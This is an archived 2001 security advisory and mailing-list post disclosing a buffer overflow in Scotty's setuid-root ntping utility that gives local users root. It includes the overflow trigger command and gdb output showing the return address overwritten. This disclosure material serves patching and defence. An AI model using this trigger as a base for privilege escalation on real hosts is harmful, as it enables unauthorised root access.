Scotty Tcl Interpreter's ntping Utility Lets Local Users Obtain Root Privileges
|
|
SecurityTracker Alert ID: 1001770 |
|
SecurityTracker URL: http://securitytracker.com/id/1001770
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 17 2001
|
Impact:
Execution of arbitrary code via local system, Root access via local system
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): prior to 2.1.11
|
Description:
A vulnerability has been discovered in Scotty, a Tcl interpreter for network management applications. The security hole exists in the ntping utiltiy and allows local users to execute arbitrary code and gain root level privileges on the host.
The following command will reportedly trigger the buffer overflow vulnerability:
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Because ntping is installed with set user id and set group id 'root' privileges, this buffer overflow can allow a local user to execute code with an effective user id of 'root'.
|
Impact:
A local user can execute arbitrary code and gain root level privileges on the host.
|
Solution:
The vendor has released a fix (scotty 2.1.11).
|
Vendor URL: wwwhome.cs.utwente.nl/~schoenw/scotty/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Sun, 17 Jun 2001 10:05:07 -0400
Subject: suid scotty (ntping) overflow
|
I am not sure that this made it on to the list the first time I sent
it... so sorry
if this is a duplicate
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
What led me to research this:
arndt@aorta.tat.physik.uni-tuebingen.de (Michael Arndt) wrote:
> i run scotty-testsuite: what must i change on my system:(Linux
> slackware):
> ==== Test generated error:
> can not connect straps socket: Permission denied
straps and ntping must be installed suid root.
^------- Hrmm I sure thought that was interesting to know *grin*
Vendors affected:
unknown by the author of this document
just a note I found however...
<19990702221232.79B119410@Galois.suse.de>
Hi folks,
here is the long promised posting of all suid/sgid files on a alpha of
SuSE
Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so thats the reason for
the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
...
[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x40079b66 in getenv () from /lib/libc.so.6
#1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2 0x4013b9de in __res_ninit () from /lib/libc.so.6
#3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4 0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5 0x080495b8 in _start ()
#6 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
-KF
|
|
